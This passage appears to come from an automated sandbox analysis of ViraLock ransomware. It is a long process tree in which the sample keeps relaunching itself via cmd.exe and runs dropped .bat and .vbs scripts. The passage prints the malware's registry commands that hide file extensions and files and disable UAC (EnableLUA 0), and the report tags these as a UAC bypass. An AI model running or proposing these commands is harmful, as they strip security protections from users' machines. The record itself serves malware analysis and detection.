        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        215⤵
        
        PID:2224
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        216⤵
        
        PID:772
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        217⤵
        
        PID:3796
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        217⤵
        
        PID:2276
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        218⤵
        
        PID:4068
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        219⤵
        
        PID:5056
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        220⤵
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        221⤵
        
        PID:1040
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        222⤵
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        223⤵
        
        PID:2524
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        224⤵
        
        PID:3996
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        225⤵
        
        PID:1184
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        226⤵
        
        PID:3792
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        227⤵
        
        PID:1660
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        228⤵
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        229⤵
        
        PID:3320
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        230⤵
        
        PID:668
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        231⤵
        
        PID:1216
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        231⤵
        
        PID:1784
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        232⤵
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        233⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        234⤵
        
        PID:1276
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        235⤵
        
        PID:3524
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        235⤵
        
        PID:3064
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        236⤵
        
        PID:3636
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        237⤵
        
        PID:4068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        238⤵
        
        PID:4200
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        239⤵
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        239⤵
        
        PID:2508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        240⤵
        
        PID:3020
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        241⤵
        
        PID:3928
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        242⤵
        
        PID:668
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        243⤵
        
        PID:1012
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        244⤵
        
        PID:3636
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        245⤵
        
        PID:3908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        246⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        247⤵
        
        PID:2740
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        248⤵
        
        PID:3068
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        249⤵
        
        PID:3584
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        250⤵
        
        PID:1788
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        251⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        252⤵
        
        PID:3996
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        253⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        254⤵
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        255⤵
        
        PID:2392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        256⤵
        
        PID:3820
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        257⤵
        
        PID:4520
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        258⤵
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        259⤵
        
        PID:3584
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        260⤵
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        261⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        262⤵
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        263⤵
        
        PID:1844
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        264⤵
        
        PID:4116
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        265⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        265⤵
        
        PID:4528
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        266⤵
        
        PID:4820
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        267⤵
        
        PID:3064
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        268⤵
        
        PID:3796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        269⤵
        
        PID:3436
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        269⤵
        
        PID:2908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        270⤵
        
        PID:3324
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        271⤵
        
        PID:1084
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        272⤵
        
        PID:4408
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        273⤵
        
        PID:4680
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        274⤵
        
        PID:3532
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        275⤵
        
        PID:4528
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        275⤵
        
        PID:232
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        276⤵
        
        PID:1640
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        277⤵
        
        PID:2588
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        276⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2200
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        276⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        274⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        274⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        274⤵
        UAC bypass
        
        PID:440
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        275⤵
        
        PID:4976
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fIosMAQA.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        274⤵
        
        PID:3936
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        275⤵
        
        PID:3524
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        275⤵
        
        PID:4016
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        272⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1860
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        273⤵
        
        PID:3464
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        272⤵
        Modifies registry key
        
        PID:2720
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        272⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HOwIsQoQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        272⤵
        
        PID:4604
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        273⤵
        
        PID:2636
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        270⤵
        Modifies registry key
        
        PID:1140
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        270⤵
        
        PID:2796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        270⤵
        UAC bypass
        
        PID:3448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zWYcYUwU.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        270⤵
        
        PID:1980
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        271⤵
        
        PID:4200
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        271⤵
        
        PID:4140
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        268⤵
        
        PID:3596
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        268⤵
        Modifies registry key
        
        PID:3032
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        268⤵
        UAC bypass
        
        PID:1468
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oQkkAAog.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        268⤵
        
        PID:696
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        269⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        266⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        266⤵
        
        PID:3752
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        267⤵
        
        PID:668
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        266⤵
        
        PID:2724
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CgkgwUUM.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        266⤵
        
        PID:1104
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        267⤵
        
        PID:2064
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        264⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4512
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        265⤵
        
        PID:3028
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        264⤵
        
        PID:1728
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        264⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gcgccYIM.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        264⤵
        
        PID:3840
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        265⤵
        
        PID:3832
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        265⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        262⤵
        Modifies registry key
        
        PID:1872
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        262⤵
        
        PID:3996
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        262⤵
        UAC bypass
        
        PID:2276
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        263⤵
        
        PID:1420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UEsYQEkw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        262⤵
        
        PID:4140
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        263⤵
        
        PID:2988
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        263⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        260⤵
        
        PID:2232
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        261⤵
        
        PID:3148
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        260⤵
        Modifies registry key
        
        PID:3032
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        260⤵
        
        PID:4724
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\baYcQksA.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        260⤵
        
        PID:4652
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        261⤵
        
        PID:2292
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        258⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2860
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        259⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        258⤵
        
        PID:3524
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        258⤵
        
        PID:1324
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XqEwkQQU.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        258⤵
        
        PID:2064
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        259⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        256⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        256⤵
        
        PID:1976
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        256⤵
        UAC bypass
        
        PID:3028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZusAUIoc.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        256⤵
        
        PID:3464
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        257⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        254⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4600
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        254⤵
        
        PID:772
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        254⤵
        
        PID:1600
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jyQgoosc.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        254⤵
        
        PID:4508
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        255⤵
        
        PID:2060
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        252⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1924
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        252⤵
        Modifies registry key
        
        PID:2524
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        252⤵
        UAC bypass
        
        PID:1184
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        253⤵
        
        PID:916
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\syYIEwsA.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        252⤵
        
        PID:4596
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        253⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        253⤵
        
        PID:2268
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        250⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        250⤵
        
        PID:4168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        250⤵
        
        PID:1464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ioEMIQcs.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        250⤵
        
        PID:956
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        251⤵
        
        PID:3916
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        248⤵
        
        PID:3840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        248⤵
        
        PID:672
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        249⤵
        
        PID:3640
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        248⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iYQoYQwQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        248⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        249⤵
        
        PID:2636
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        246⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:4452
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        246⤵
        
        PID:616
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        246⤵
        UAC bypass
        
        PID:3800
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YeQQMckM.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        246⤵
        
        PID:1420
        
